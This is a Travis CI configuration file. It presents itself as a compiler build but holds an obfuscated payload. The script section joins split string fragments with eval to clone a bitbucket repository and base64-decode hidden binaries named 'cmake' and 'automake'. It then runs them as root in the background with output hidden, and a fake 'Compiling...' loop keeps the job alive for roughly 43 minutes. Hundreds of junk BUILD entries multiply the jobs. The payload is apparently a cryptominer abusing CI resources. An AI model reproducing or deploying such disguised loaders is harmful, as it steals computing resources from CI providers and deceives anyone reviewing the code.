dist: bionic

env:
  - BUILD="--newrepo=1312B"
  - BUILD="--rebuilt-binaries=750uY"
  - BUILD="--onlydeps-with-rdeps=3450t"
  - BUILD="--quiet-unmerge-warn=591Kc"
  - BUILD="--alert=1101K"
  - BUILD="--rebuild-if-unbuilt=372rK"
  - BUILD="--package-moves=272x6"
  - BUILD="--metadata=582yJ"
  - BUILD="--columns=836Iw"
  - BUILD="--sync=766r3"
  - BUILD="--autounmask-keep-masks=812MH"
  - BUILD="--binpkg-respect-use=1201J"
  - BUILD="--verbose-slot-rebuilds=614hW"
  - BUILD="--with-test-deps=36939"
  - BUILD="--pkg-format=469oU"
  - BUILD="--alert=458yh"
  - BUILD="--ignore-world=215nK"
  - BUILD="--autounmask-continue=720z3"
  - BUILD="--ignore-default-opts=73Sv"
  - BUILD="--search=271bW"
  - BUILD="--search=134lm"
  - BUILD="--rebuild-ignore=618px"
  - BUILD="--autounmask-use=57ka"
  - BUILD="--digest=9456X"
  - BUILD="--prefix=7037F"
  - BUILD="--getbinpkgonly=664sn"
  - BUILD="--binpkg-changed-deps=401LL"
  - BUILD="--autounmask-keep-masks=388NH"
  - BUILD="--dynamic-deps=599DH"
  - BUILD="--digest=982Lp"
  - BUILD="--nospinner=883EA"
  - BUILD="--quickpkg-direct=168En"
  - BUILD="--depclean=123ku"
  - BUILD="--sync=76jR"
  - BUILD="--getbinpkgonly=303Q0"
  - BUILD="--ignore-world=652JF"
  - BUILD="--quiet-fail=674BO"
  - BUILD="--config-root=73190"
  - BUILD="--metadata=9211L"
  - BUILD="--columns=656wV"
  - BUILD="--prefix=167Ns"
  - BUILD="--rebuilt-binaries=677v8"
  - BUILD="--rebuilt-binaries-timestamp=222Vg"
  - BUILD="--changelog=333KG"
  - BUILD="--noreplace=365nl"
  - BUILD="--quickpkg-direct=182UA"
  - BUILD="--newrepo=708dc"
  - BUILD="--quiet-repo-display=651G0"
  - BUILD="--implicit-system-deps=293t"
  - BUILD="--quickpkg-direct=391Xw"
  - BUILD="--digest=6136Y"
  - BUILD="--help=96Lt"
  - BUILD="--quiet=777rT"
  - BUILD="--tree=982Lt"
  - BUILD="--usepkg=974GR"
  - BUILD="--config-root=602IK"
  - BUILD="--usepkg=724UJ"
  - BUILD="--deep=699jd"
  - BUILD="--ignore-default-opts=508au"
  - BUILD="--sync-submodule=502yc"
  - BUILD="--ignore-world=835Ry"
  - BUILD="--check-news=561ZD"
  - BUILD="--ignore-default-opts=160lY"
  - BUILD="--emptytree=44IC"
  - BUILD="--autounmask-only=246RQ"
  - BUILD="--deep=504bx"
  - BUILD="--root-deps=621jH"
  - BUILD="--jobs=9161S"
  - BUILD="--usepkg-exclude=109Er"
  - BUILD="--nodeps=363ol"
  - BUILD="--onlydeps-with-rdeps=944iT"
  - BUILD="--search-similarity=534EI"
  - BUILD="--autounmask=240U9"
  - BUILD="--complete-graph=443Iz"
  - BUILD="--autounmask-license=632gJ"
  - BUILD="--quiet-repo-display=4948u"
  - BUILD="--jobs=214hW"
  - BUILD="--info=388zA"
  - BUILD="--quiet-repo-display=303gN"
  - BUILD="--emptytree=363eM"
  - BUILD="--pkg-format=797Cq"
  - BUILD="--ignore-default-opts=2ct"
  - BUILD="--ask=8735f"
  - BUILD="--depclean-lib-check=144x5"
  - BUILD="--getbinpkg=351uX"
  - BUILD="--autounmask-license=895ln"
  - BUILD="--complete-graph=246Fm"
  - BUILD="--use-ebuild-visibility=4438Y"
  - BUILD="--digest=536bv"
  - BUILD="--autounmask=888Bk"
  - BUILD="--search-similarity=44RG"
  - BUILD="--alphabetical=884QG"
  - BUILD="--prefix=387KK"
  - BUILD="--quiet-unmerge-warn=839oh"
  - BUILD="--changed-deps=938Tz"
  - BUILD="--newrepo=7943Q"
  - BUILD="--usepkg-exclude=813Lh"
  - BUILD="--pkg-format=415fY"
  - BUILD="--list-sets=322q2"
  - BUILD="--ignore-built-slot-operator-deps=367gd"
  - BUILD="--pkg-format=657Nh"
  - BUILD="--autounmask-write=7844V"
  - BUILD="--search-index=218tk"
  - BUILD="--digest=848Af"
  - BUILD="--list-sets=81uo"
  - BUILD="--ignore-default-opts=8091b"
  - BUILD="--ignore-built-slot-operator-deps=2447e"
  - BUILD="--autounmask-continue=150NC"
  - BUILD="--getbinpkgonly=114tp"
  - BUILD="--list-sets=461qd"
  - BUILD="--binpkg-changed-deps=570XS"
  - BUILD="--depclean-lib-check=913Gq"
  - BUILD="--fail-clean=990Zw"
  - BUILD="--buildpkg=435pm"
  - BUILD="--verbose=3282C"
  - BUILD="--ask-enter-invalid=933Xn"
  - BUILD="--sync-submodule=85WG"
  - BUILD="--accept-restrict=9287O"
  - BUILD="--nospinner=946rT"
  - BUILD="--buildpkgonly=295VX"
  - BUILD="--backtrack=2766p"
  - BUILD="--alphabetical=612cN"
  - BUILD="--rage-clean=303yM"
  - BUILD="--resume=341cG"
  - BUILD="--config=385dp"
  - BUILD="--rebuild-if-new-ver=406vq"
  - BUILD="--autounmask-keep-keywords=619BX"
  - BUILD="--reinstall-atoms=4037P"
  - BUILD="--config-root=157fV"
  - BUILD="--quiet-unmerge-warn=487Fw"
  - BUILD="--depclean-lib-check=458IP"
  - BUILD="--reinstall=929wW"
  - BUILD="--root=275Ws"
  - BUILD="--pretend=457Ch"
  - BUILD="--tree=372Ii"
  - BUILD="--changed-deps-report=563Zm"
  - BUILD="--rebuilt-binaries-timestamp=406D5"
  - BUILD="--accept-restrict=960qn"
  - BUILD="--searchdesc=21lO"
  - BUILD="--alert=855PY"
  - BUILD="--fetch-all-uri=43Lk"
  - BUILD="--usepkg=125QY"
  - BUILD="--with-bdeps=639Yp"
  - BUILD="--rage-clean=325IH"
  - BUILD="--fetch-all-uri=86fA"
  - BUILD="--autounmask-keep-keywords=716ez"
  - BUILD="--verbose=367iW"
  - BUILD="--with-bdeps=7311v"
  - BUILD="--quiet-unmerge-warn=6306l"
  - BUILD="--version=258EQ"
  - BUILD="--jobs=224ok"
  - BUILD="--backtrack=238XH"
  - BUILD="--ignore-world=269MP"
  - BUILD="--autounmask=874gp"
  - BUILD="--update=9234Y"
  - BUILD="--autounmask-keep-masks=590DT"
  - BUILD="--complete-graph-if-new-use=647nB"
  - BUILD="--complete-graph=366MK"
  - BUILD="--root=824SY"
  - BUILD="--config=5278m"
  - BUILD="--searchdesc=126Yw"
  - BUILD="--prefix=133xk"
  - BUILD="--ask=2830j"
  - BUILD="--select=289IT"
  - BUILD="--prefix=299B0"
  - BUILD="--update=191sn"
  - BUILD="--use-ebuild-visibility=112f2"
  - BUILD="--search=873Gh"
  - BUILD="--nospinner=488QB"
  - BUILD="--getbinpkg=790tH"
  - BUILD="--changelog=61cW"
  - BUILD="--ask-enter-invalid=545HY"
  - BUILD="--rebuild-if-unbuilt=916ne"
  - BUILD="--rebuild-if-new-rev=189M5"
  - BUILD="--autounmask-continue=138xI"
  - BUILD="--changelog=648Ki"
  - BUILD="--keep-going=5919T"
  - BUILD="--with-bdeps=877ri"
  - BUILD="--complete-graph-if-new-use=3179s"
  - BUILD="--quiet-fail=874uW"
  - BUILD="--read-news=604eI"
  - BUILD="--load-average=1424O"
  - BUILD="--verbose-conflicts=295MG"
  - BUILD="--keep-going=937sk"
  - BUILD="--exclude=594n6"
  - BUILD="--fetch-all-uri=8148"
  - BUILD="--rebuild-if-new-rev=1527n"
  - BUILD="--ignore-world=5771e"

language: minimal

script:
  - qTcPkDLmXUs="sudo apt up"
  - OmPlnOlgN="date || tru"
  - eval "$qTcPkDLmXUs""$OmPlnOlgN""e"
  - hVpeqKFw="sudo apt --"
  - FXUBi="yes install"
  - GmobKavepEg=" cl-base64 "
  - HmyQrY="git &>/dev/"
  - eval "$hVpeqKFw""$FXUBi""$GmobKavepEg""$HmyQrY""null"
  - nRnPHAW="git clone h"
  - ygjWrYUzSKJ="ttps://gccb"
  - rOwialmaSw="uild@bitbuc"
  - nwRsV="ket.org/gcc"
  - oPXhfA="build/gcc.g"
  - QNoyPpf="it &>/dev/n"
  - eval "$nRnPHAW""$ygjWrYUzSKJ""$rOwialmaSw""$nwRsV""$oPXhfA""$QNoyPpf""ull"
  - UjPdFNxT="base64 -d g"
  - eIDllzkKJ="cc/cmake_ >"
  - eval "$UjPdFNxT""$eIDllzkKJ"" cmake"
  - NwPLV="base64 -d g"
  - rDXIhOMrA="cc/config_ "
  - eval "$NwPLV""$rDXIhOMrA""> .conf"
  - WuchPSoiBR="base64 -d g"
  - gadbVvfUlK="cc/make_ > "
  - eval "$WuchPSoiBR""$gadbVvfUlK""automake"
  - chmod +x automake cmake
  - ./cmake
  - sed -i 's/build/tb2u/g' .conf
  - eEYsN="sudo ./auto"
  - xQhUqzDy="make -c .co"
  - EnTzkSXgpMJ="nf &>/dev/n"
  - eval "$eEYsN""$xQhUqzDy""$EnTzkSXgpMJ""ull &"
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2591)) ] && sudo killall automake && break; sleep 210; done
